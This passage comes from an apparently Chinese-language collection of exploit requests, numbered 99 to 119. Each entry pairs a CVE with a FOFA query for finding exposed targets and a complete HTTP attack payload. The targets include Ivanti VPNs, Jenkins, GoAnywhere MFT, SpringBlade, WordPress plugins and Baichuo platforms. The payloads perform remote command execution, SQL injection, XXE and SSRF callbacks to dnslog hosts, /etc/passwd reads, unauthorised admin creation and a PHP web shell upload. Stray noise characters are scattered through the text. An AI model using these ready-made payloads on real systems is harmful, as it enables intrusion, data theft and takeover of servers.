Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& x0 l- K' ^+ V% o/ M! Z. bContent-Type: application/x-www-form-urlencoded; charset=UTF-8
7 K3 p0 l( m* FX-Requested-With: XMLHttpRequest
) f" F N8 K" z( B4 x. J5 H
( M; v9 Z' b/ V rid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
; [0 \! ]7 N; z# } [- N0 B- i7 C0 H$ u0 q1 {& o. u+ J2 m
6 d' _9 `; `& _' \0 ]99. Ncast盈可视高清智能录播系统busiFacade RCE: e) b1 C9 b( v, q
CVE-2024-0305. Y6 K# N4 N' C/ i
FOFA:app="Ncast-产品" && title=="高清智能录播系统"6 s& C0 `( Z/ f, z
POST /classes/common/busiFacade.php HTTP/1.1
+ S. U! y( _3 j# d! mHost: 192.168.40.130:8080: Q. L; {6 t- V1 R( n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.08 Q' o, u5 v9 h9 e: \$ ]+ m
Connection: close+ J2 S6 q) B! E( V0 b5 I
Content-Length: 154
" f& ~8 v9 `* b8 O' X7 P; I, aAccept: */*
% h0 i4 b) n1 N1 s2 z. kAccept-Encoding: gzip, deflate
2 z% O, s! d' D) j) gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. ^8 N% f. V! t0 @) E2 kContent-Type: application/x-www-form-urlencoded; charset=UTF-80 R. ?* f7 S; K8 t
X-Requested-With: XMLHttpRequest
) p7 V, b# b& b* R( h* x
% M7 N: [6 S- q; U6 v2 P6 M%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
0 N( \( _6 `* y3 w; B8 c' s: H( l. D
6 V) r3 S' A+ ~* D: I7 l Z100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传& u1 V# H( F5 W' c: ?
CVE-2024-0352$ J M# \5 V7 |6 v3 e5 a
FOFA:icon_hash="874152924"/ i+ q5 h2 D1 h0 b2 O+ A. Y. A
POST /api/file/formimage HTTP/1.1
K' f1 v: t3 AHost: 192.168.40.130. k. n* a. L* n- e
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
7 x! Y. k0 G; q5 i, w& gConnection: close2 u w* \* H+ L3 B$ ]( G$ y
Content-Length: 201$ d& A" p% G$ a, T3 i+ \+ Q; u" p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei" E. Z# t0 p2 n$ |: }- f; S
Accept-Encoding: gzip
; _, J9 r& t# Y/ b, X- {" M$ g# o8 x" Q l' j1 m) G8 T: I3 U
------WebKitFormBoundarygcflwtei
# U2 A: {; s" ]! kContent-Disposition: form-data; name="file";filename="IE4MGP.php"3 y3 }2 }; M0 y
Content-Type: application/x-php
7 ^ {, S* S' e8 _2 |' `0 \
: h( `+ ^# l# g* w2ayyhRXiAsKXL8olvF5s4qqyI2O
" y' A& ^$ l2 L+ G( ~* i* Y* e7 D# X------WebKitFormBoundarygcflwtei--! W2 n1 |6 }- r- t
# V" |% [0 B) t$ R3 v
3 s7 i# Y, {, f3 Q
101. ivanti policy secure-22.6命令注入
q3 X5 B9 z& g7 j& k) N/ K' mCVE-2024-218871 z: D( ~+ Z- u8 L; H! z0 Z9 U
FOFA:body="welcome.cgi?p=logo"
: l- F- Y! E9 h4 U/ B1 _0 CGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.10 L5 G$ N% Q4 r' ~$ C9 |$ J8 M2 X
Host: x.x.x.xx.x.x.x
6 p) ^7 S( G% W7 D$ S8 x0 ?) m& ]User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 G G; S1 e5 Z BConnection: close
' D) j7 N, m; n1 b( b. [) i, u+ qAccept-Encoding: gzip. _0 I/ A3 X; l6 d5 R
2 S" W5 g0 _2 k! U4 ?
' ]0 k. ]! D) B# _' Y. q1 a) ~
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
+ y: o0 J: T* A, x$ I; @; q% R; iCVE-2024-21893( r. y& Z0 \9 _+ f0 }5 x: ~& K4 y5 k
FOFA:body="welcome.cgi?p=logo" U/ X( v6 A. N, [5 e1 `
POST /dana-ws/saml20.ws HTTP/1.1
8 n! R4 R% c% ~2 YHost: x.x.x.x
: C% ]1 J. Z, Y! N4 r' Y1 D& @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& g! r' E$ W6 L1 Z9 o1 U$ h& XConnection: close2 L$ y8 I3 B5 Y& ^' A% {
Content-Length: 792
. ~0 U' H$ Q4 |- a/ V$ z% S; k0 bAccept-Encoding: gzip
( v0 N c4 f5 |' u# e2 F# j' E n ^- |9 j0 u: o
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
1 M; o7 O4 F+ j: U0 ^8 b$ W3 j `0 r2 i7 ?( k% v
103. Ivanti Pulse Connect Secure VPN XXE* D3 o& J* p6 L6 J) L& F
CVE-2024-22024
! h$ x. f( j! y2 h2 h F4 WFOFA:body="welcome.cgi?p=logo"
. B5 I9 z9 T) \' yPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
/ r% ? H$ _- D3 r2 ZHost: 192.168.40.130:111
: k: x# z) p9 x" XUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36* B3 n! [1 J0 Y0 N6 D# v
Connection: close: X( e' T$ Q# y+ n& p! g, T v+ c
Content-Length: 204. Z' n( O; W% s/ J0 K
Content-Type: application/x-www-form-urlencoded& Y$ S# b7 j0 }0 P/ O
Accept-Encoding: gzip
" A% u+ E- R5 t( @' d# d6 P6 C1 |, n4 ]1 R u
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==5 D8 a7 Z; C" `$ `4 P* S- X0 o
0 {" i$ {4 e; p, s: i0 C7 V. w+ B' y3 ?5 ^* M# G
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
& q# V3 i( U: Z% R<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>+ d! _1 a# |# P' ^. g
; b3 |$ x: N" l' ]
2 U- v1 ~, \" A$ o+ B1 H104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
y7 i7 Z( A/ D5 L1 W3 w! w v$ ?; _' PCVE-2024-05698 w. M( b. b/ L3 \- _6 Z& Y
FOFA:title="TOTOLINK"
0 Y' }' V/ D+ p7 v: H2 s: XPOST /cgi-bin/cstecgi.cgi HTTP/1.1
. x7 R+ E( O& m" L# K8 q m: ~Host:192.168.0.16 v5 C H/ U# v$ e
Content-Length:418 i' R9 }( k5 I8 ~- @) ?* A
Accept:application/json,text/javascript,*/*;q=0.01 R: a# o. `! [1 L0 F2 F s/ f5 }/ r
X-Requested-with: XMLHttpRequest/ N- S+ n4 t) R1 i8 h/ c
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
& X1 P* r4 t3 T9 ]8 I0 _- ^7 HContent-Type: application/x-www-form-urlencoded:charset=UTF-8
& B+ f: U3 H" L2 ^3 W% t1 tOrigin: http://192.168.0.1
+ L, K' ~; g% z5 [- S, n! gReferer: http://192.168.0.1/advance/index.html?time=1671152380564
" G9 G7 q7 z: NAccept-Encoding:gzip,deflate- U$ F: q7 n# f: w
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7+ n- ]- _8 z) M. k
Connection:close9 ]4 ^2 X q, Q! A- A
+ k; h3 c2 D* {+ @6 k{
: j; v, ~$ F! H9 Y3 @"topicurl":"getSysStatusCfg",
/ t9 U8 C( c6 Z3 j5 K"token":""
$ [5 O. [ Z7 {1 F}
* |! t$ Z5 e2 N A4 I1 t2 K9 _$ N& H! q! ~$ O8 T
105. SpringBlade v3.2.0 export-user SQL 注入
* e9 T; @+ }& _' |7 O# l- `% ZFOFA:body="https://bladex.vip"3 |/ J1 B, ]# I1 a' Q" W
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
3 Q( J: R Z7 m, l% O& b# {" W( C
: ~6 j0 J! I" E$ T! a2 r2 c106. SpringBlade dict-biz/list SQL 注入
/ E( W, ]" E6 h( O) F7 \+ ]FOFA:body="Saber 将不能正常工作"
2 {: m5 ?1 y7 ZGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
" i2 B: i ~2 r9 f$ P7 E3 H, \9 JHost: your-ip
# B& m/ X: ^2 j- K* O$ zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 |6 X6 f; L3 j. X+ }
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
7 x7 u0 n' ?: |. \, ^Accept-Encoding: gzip, deflate9 T4 O- I6 u, U3 j5 h- N
Accept-Language: zh-CN,zh;q=0.9) y+ ]' s* Z1 w4 y
Connection: close' |/ W" d A8 m N8 c
5 K& m; f5 L: n5 C8 W& F
% H& S# h+ U- ^3 G( b, p
107. SpringBlade tenant/list SQL 注入
! c0 n& a; T! X; o0 lFOFA:body="https://bladex.vip"! i1 b8 X N2 M' n% {3 o* [
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.14 @* [2 }/ `% i3 [9 S m: Q& f
Host: your-ip
) t3 K6 F( W6 J( t9 P* U* D8 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" ?1 f) {1 _2 o. e3 HBlade-Auth:替换为自己的
, q+ Y4 C; e7 N; C1 V" R2 w% {Connection: close8 ] M" A3 K) `; r( W2 j
- R) X9 f# j& D0 e! P9 T# ~' t4 l* ]4 |5 e& {% Q6 @8 T
108. D-Tale 3.9.0 SSRF
' U; e/ }4 P& a3 r2 i" O: R' TCVE-2024-21642
3 q' V H9 Z+ K6 JFOFA:"dtale/static/images/favicon.png"- @- Z& V4 g4 l8 y5 Q" s
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
) y6 r" j+ J( j; ?+ @5 b, _Host: your-ip
" t5 Y- s& x8 T- X; B! |- tAccept: application/json, text/plain, */*' l3 C6 d, _8 j2 Y2 {! K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 k1 N5 ?2 {; J+ \0 cAccept-Encoding: gzip, deflate$ t7 O9 U5 u/ f9 o: @* j
Accept-Language: zh-CN,zh;q=0.9,en;q=0.89 x/ @ p0 p* g
Connection: close! k! p0 I# T$ _
' E9 T1 [; ?2 }/ E5 Z* m
( ^. X7 f/ d/ L' W, [' A0 {109. Jenkins CLI 任意文件读取6 {; j+ O; o2 A% a, N/ _) f
CVE-2024-23897& N: }% s: x+ u* K$ z% m
FOFA:header="X-Jenkins"
: t+ I# D3 Q/ V% cPOST /cli?remoting=false HTTP/1.1
+ K5 c# |* z: ^ ^8 ~& V1 RHost:1 Y/ z( m, d& Q2 ?7 \2 C
Content-type: application/octet-stream% e4 m2 p. H3 E! {, s+ U& _9 U
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92( N% G7 O7 L+ q7 {. Z
Side: upload
9 d2 l! i. P# @Connection: keep-alive
) [3 o4 c& n( |% {6 AContent-Length: 163
}+ V8 y. T2 W4 s2 z7 v! c' W, B- j9 Z! N
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
6 w3 {# T C0 Y5 W5 \8 j H& v/ b" d4 N* k7 h. ]0 z4 t
; Y, \9 n6 {0 |
POST /cli?remoting=false HTTP/1.1. S, }8 v" A1 r% I/ ?, ]
Host:
2 y8 u& I/ `1 b( g( ASession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
* `- l F5 G8 k2 h# M0 Idownload4 F# J$ u8 \) V4 t5 V
Content-Type: application/x-www-form-urlencoded& I# ]. R) F) V8 G( _( i0 N. J- y
Content-Length: 02 {8 f" Q: _/ L- c7 m2 {( Q$ G
; w# S. w9 _1 x0 j! e/ i9 |2 ~
9 d$ L) u9 z4 u# B
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
. W+ F, [1 o3 W0 Hjava -jar jenkins-cli.jar help
; S3 ^; B, v* v$ ]3 `$ F0 s: Y B) }[COMMAND]# L' u# Q8 Q. b
Lists all the available commands or a detailed description of single command.; ]9 O: X" t: f7 C8 v) a' U8 d+ c
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)/ D" J; x8 v v! Q c9 q C, O
8 f; x! `9 s) c' D% b
$ Y& \( o/ Q* `: q* q0 g. J' w$ u
110. Goanywhere MFT 未授权创建管理员
2 n8 @2 f- P) p: W$ G, u( ?CVE-2024-0204
7 t. Y$ e( @+ B) }- Y) dFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"* |* O& ^) q& y* T( M4 T
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1( p6 l2 _1 T# W3 y4 O2 U
Host: 192.168.40.130:8000. c) i4 E( y" W6 ~6 J
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 B) i% T: Q- I4 m
Connection: close0 L2 b" m; b: W+ i0 I$ ^
Accept: */*' e' l1 h$ P8 |8 X k! g0 ~
Accept-Language: en
% K- y' R$ J+ ~9 t+ dAccept-Encoding: gzip1 Q9 j0 R! _2 }- A, a8 M
% C' }3 q( Q) X7 {* U9 X4 _$ _' z! f C9 w
111. WordPress Plugin HTML5 Video Player SQL注入
, j6 z% c: r5 `; a2 J FCVE-2024-1061
; t( b7 e1 {; j z1 _FOFA:"wordpress" && body="html5-video-player"" L E/ {( a0 o$ S3 R$ j
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
: L b8 o; h/ L) VHost: 192.168.40.130:1122 Q8 H3 T9 r: h' i
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
0 } y2 x% w% q! @4 h" ]& m" qConnection: close
; J; N; z/ E' b: v( ~Accept: */*
& F+ r7 Y6 j6 VAccept-Language: en
) W$ ^! T1 x, l" nAccept-Encoding: gzip
% E0 h+ W1 s; m& t1 m
8 j8 `1 L% [5 B# P) g7 k7 ^% o2 o3 b6 v+ e! W" O, c
112. WordPress Plugin NotificationX SQL 注入
. \6 ]' j* ]) d- @5 gCVE-2024-1698
m2 @& ^2 B: t, k, I+ VFOFA:body="/wp-content/plugins/notificationx"
& s, Z, c, D& Q, TPOST /wp-json/notificationx/v1/analytics HTTP/1.1 q8 O( }( d1 p; v0 E ] N T0 ]
Host: {{Hostname}}! R/ V6 N# Z, o. ~8 S
Content-Type: application/json) M- S' o8 k+ u! [1 ~
' t, v9 q+ A: Z8 y) t! A9 h{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}; t6 k$ C$ R; M9 i& {0 G$ k; r
- Q1 d: J) f3 G+ H$ y$ C, Z
4 Q" K5 B% p+ M113. WordPress Automatic 插件任意文件下载和SSRF
; y- r1 m; _& H/ a0 Z X" w NCVE-2024-27954
8 k8 }' X( n, n8 t( b% a# QFOFA:"/wp-content/plugins/wp-automatic", n/ D" Q0 A5 \7 X4 s
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
. v6 x4 g. q8 f9 I) i7 ZHost: x.x.x.x% k/ }" r4 a2 h5 n1 ~# |
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
$ y! ~) V; o# TConnection: close8 F, u% A8 R, @# ?9 d# p
Accept: */*) W. o, R) n+ p+ T' }
Accept-Language: en
) e2 v) y2 C( z L4 }. xAccept-Encoding: gzip
8 _+ `! x: c2 Y" V- {# k0 ?; T7 M
1 E; C! B( m+ |# x8 z
114. WordPress MasterStudy LMS插件 SQL注入5 D) P6 ~& _( K$ f" I6 |/ y `
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
* O/ d: f" O: I& Z9 d; K- IGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.12 n5 N' r1 \9 P( E/ L! n7 u
Host: your-ip- g1 b" Q3 C6 B* Y/ t
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36% J, v( H6 ?+ ~! {
Accept-Charset: utf-8, R6 B4 y& F, O" b8 O7 t5 B
Accept-Encoding: gzip, deflate5 h* ~" A" M+ ?. j; e/ `; w* q/ x5 `
Connection: close' \+ Q- m5 y) d- S
) l7 _+ L4 o% L. }' I$ S0 @
" X, i% G; ~7 @( f4 R9 V1 \2 X115. WordPress Bricks Builder <= 1.9.6 RCE
# R0 [# l2 H/ B5 w! M8 YCVE-2024-25600
& n) s/ ^- x5 Q2 N' ZFOFA: body="/wp-content/themes/bricks/"
0 X3 f% a7 ]' P, O. \- G第一步,获取网站的nonce值
9 J1 Y! o! Z3 U; i2 }8 jGET / HTTP/1.1
$ c/ k; t7 q/ g4 Y K+ bHost: x.x.x.x
1 f/ p5 ?0 u/ P: ?4 v, [User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
y9 \. c. F P* jConnection: close" s& i! i5 K5 A- @% @) f2 W) i
Accept-Encoding: gzip& Q% o; Z% T8 S' f. j7 y8 L) h8 k
& R6 h" ]( w! L, F- ]% u: J
- z4 d V- ~) K
第二步替换nonce值,执行命令
1 e9 k/ d: x6 K: l7 ~POST /wp-json/bricks/v1/render_element HTTP/1.1
9 {* W; C$ O2 \2 w* D! QHost: x.x.x.x! W' F$ m/ `5 Y) E6 T& t1 ], U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
8 d/ A% L5 J2 z9 S# j9 U8 HConnection: close
U3 c" }, s) Z/ G' y4 |Content-Length: 356% T l' }' p* u7 v( d4 a8 G
Content-Type: application/json
9 `2 K$ H0 N# ~& M8 r2 V) [3 IAccept-Encoding: gzip
R4 t8 z' K" p3 @4 @* ~
: \. P% V; U, r" p6 u{
0 \! r, h c. ~5 A" k+ q8 g"postId": "1",
# y$ g& \; ]# F- d& @0 Q) | "nonce": "第一步获得的值",
7 l: }" \3 o& L "element": {
9 a& P+ b Z9 y9 L* u* O' W# L) E "name": "container",
( [2 B$ h( f6 \* P. z "settings": {
9 Z5 F7 K) O8 K R( O "hasLoop": "true",
; b8 D, u& ^0 P. U7 z" ^) ^) h "query": {: ~& f% u$ @# Q+ ?* v5 O4 i
"useQueryEditor": true,
4 y3 e1 Z! r5 \: h `/ n! m "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
1 a; ]: }/ y4 _5 A f0 Q "objectType": "post"( f$ w9 O! I- _
}
: r/ }, E% ~ Y/ } }" {9 b! |& u$ `7 ]- C0 A# n
}- ~) R8 `% }4 p# q9 G% r: v
}
' p* @8 e: |" C9 v% G6 u# D# @0 ?
( m( S {( H' h9 u7 {% B" |+ T" X- j( {
116. wordpress js-support-ticket文件上传
! F( }1 O+ E/ ^) N1 |$ T ]FOFA:body="wp-content/plugins/js-support-ticket" u# K+ H$ g% J
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.11 P. `1 \! G- Q0 g, a+ U
Host:
, Y+ O; V, A5 kContent-Type: multipart/form-data; boundary=--------7670991717 S+ \" j/ y: O2 t* C5 @" h
User-Agent: Mozilla/5.0, r; c, \$ e9 ~4 ]* w
0 ~9 c+ Q! N4 g& n: F
----------7670991710 W3 A9 S* D) W! ?) o6 j
Content-Disposition: form-data; name="action"9 O$ x+ n+ ?0 n3 t2 N' V
configuration_saveconfiguration
1 \% P. v% M/ W, [ J) f! J. z8 T----------767099171$ W) l! E4 K9 K* R
Content-Disposition: form-data; name="form_request"
' M) w% X; l L* G* K8 Sjssupportticket$ D; a0 g& @; ]3 S2 L
----------767099171
/ B: [+ Q( n; ^- r0 HContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
; D) x& T, b" B- ^- U& _4 ]Content-Type: image/png
$ ^7 o! M3 w* V----------767099171--" F7 Q3 \/ N& |6 e2 l, |) a
7 X4 I2 H) j1 Y0 M% B6 f. h2 n2 _7 |0 @2 Q$ i5 {
117. WordPress LayerSlider插件SQL注入4 [: p6 X; S( ?$ H e
version:7.9.11 – 7.10.0' ]) t' v& e7 t) w0 Z% C3 c0 `
FOFA:body="/wp-content/plugins/LayerSlider/"
; B) [9 s, L& i' {) LGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
2 u3 V- ~/ u' z/ Y& A, _1 F! Z% LHost: your-ip1 u8 {+ n* F: c; s$ E! o" x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
, Q6 ^. I) D* e# l* iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 O; e* D' [5 \8 ]' k/ uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 P% i3 M% S b7 J% d5 {
Accept-Encoding: gzip, deflate, br4 a% o8 y: P+ _. i) g" ?5 _4 B
Connection: close
4 D2 O# w x' J3 t0 @' gUpgrade-Insecure-Requests: 1
' i3 b, I9 [2 h8 T1 |0 A2 ?" S \* b. f" p
+ E \" W6 h# O1 e- Y& p/ i
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
: B# ~5 M( R! m, l4 [CVE-2024-0939$ q. |. e1 {& S' ?: e1 G
FOFA:title="Smart管理平台"
4 T0 T/ n7 x; ?/ m7 f5 P) OPOST /Tool/uploadfile.php? HTTP/1.1
$ R& ]& R/ b3 jHost: 192.168.40.130:8443
# r, e5 M% e5 X: i7 V- I7 ^5 f/ sCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8, P6 w7 f) X1 I8 r; p' d5 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0) U3 G1 X! j) A: W/ G1 T. O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: F% S& U0 X; FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
w. o: ^# D) B( C' B$ qAccept-Encoding: gzip, deflate% B3 B) C6 ]2 \1 W% {+ v( U
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
3 |9 T% N0 l+ @- m' p' AContent-Length: 405
/ N( m6 S0 M" P+ }" ?4 t& G4 g/ ?Origin: https://192.168.40.130:8443
& }- j+ U! i+ xReferer: https://192.168.40.130:8443/Tool/uploadfile.php
4 D/ y6 w* ~# Q `- F) gUpgrade-Insecure-Requests: 14 j L) t7 s4 Z4 K3 Z1 D
Sec-Fetch-Dest: document
2 a% E @; q* N* f* \. p- @; WSec-Fetch-Mode: navigate. @3 t9 f" d% G% D
Sec-Fetch-Site: same-origin. G. ?* P1 }. z3 _ o. u
Sec-Fetch-User: ?1
( y% K$ }2 b* I7 g2 @4 X) w# q& tTe: trailers
! l3 p1 w! ^/ g4 B. H GConnection: close
) p, l, X; E' G3 R; v
; F2 c: A ^" b; R* M! n-----------------------------13979701222747646634037182887
8 B6 {# ^( f) ^- W1 v/ S5 ^Content-Disposition: form-data; name="file_upload"; filename="contents.php"
5 M1 ]" V! m- Y# K. }1 LContent-Type: application/octet-stream0 ~' U9 s8 N2 Q3 |# `$ ^
/ M' m$ r6 B1 V: B" u<?php7 ^/ T$ i- E9 n; Q2 V7 L; N a
system($_POST["passwd"]);( F8 \( A! l9 e2 _8 f8 }
?>
& }: S, J3 ^2 u0 ^-----------------------------13979701222747646634037182887
7 C$ w7 X% ]/ Z$ ^Content-Disposition: form-data; name="txt_path"" O3 }% T: t! @0 g
! o- q, |4 B, g7 H+ {/home/src.php! r# {6 p* z$ b$ z1 G$ F2 D
-----------------------------13979701222747646634037182887--- v; ?2 A/ K# \! u' ~. o% s- ?
& J' k, h g0 @/ {1 |
8 p" ]( S1 s2 r5 Y7 C- F! R访问/home/src.php6 _7 G* ]1 H6 p* J% X5 K0 H9 Y
! \ i% n' n# q2 M3 G119. 北京百绰智能S20后台sysmanageajax.php sql注入; |1 z$ l# P# o8 j6 H E
CVE-2024-1254
: z) W( z. r8 M/ l+ H* UFOFA:title="Smart管理平台"
2 i3 j; m. |6 J先登录进入系统,默认账号密码为admin/admin
( g# j' V) o/ A+ yPOST /sysmanage/sysmanageajax.php HTTP/1.113 S g0 u+ t& U; t; g
Host: x.x.x.x
" M& d, Q' Z+ s- w7 Z4 ]1 pCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee. @) i4 a4 n! n( V, G' ?' W# Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.08 X$ k# r* p. y3 r' L
Accept: */*2 t- Y' Q6 C2 }4 ]! z) w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) T) q) l! \' ^9 @Accept-Encoding: gzip, deflate
& y2 u" ]4 l5 n3 I. F- MContent-Type: application/x-www-form-urlencoded;
- B% F* Y" a6 p0 N+ `Content-Length: 109$ a, b( i; o) F' `
Origin: https://58.18.133.60:8443) H f' M, I, J% D- o# m
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
) B$ D; A6 _8 ~: YSec-Fetch-Dest: empty
! [. A. J' S7 l7 J4 L; A4 ZSec-Fetch-Mode: cors& r% U8 z! ~1 m% \6 u( b; y0 v
Sec-Fetch-Site: same-origin& d) q8 u, e- _/ x
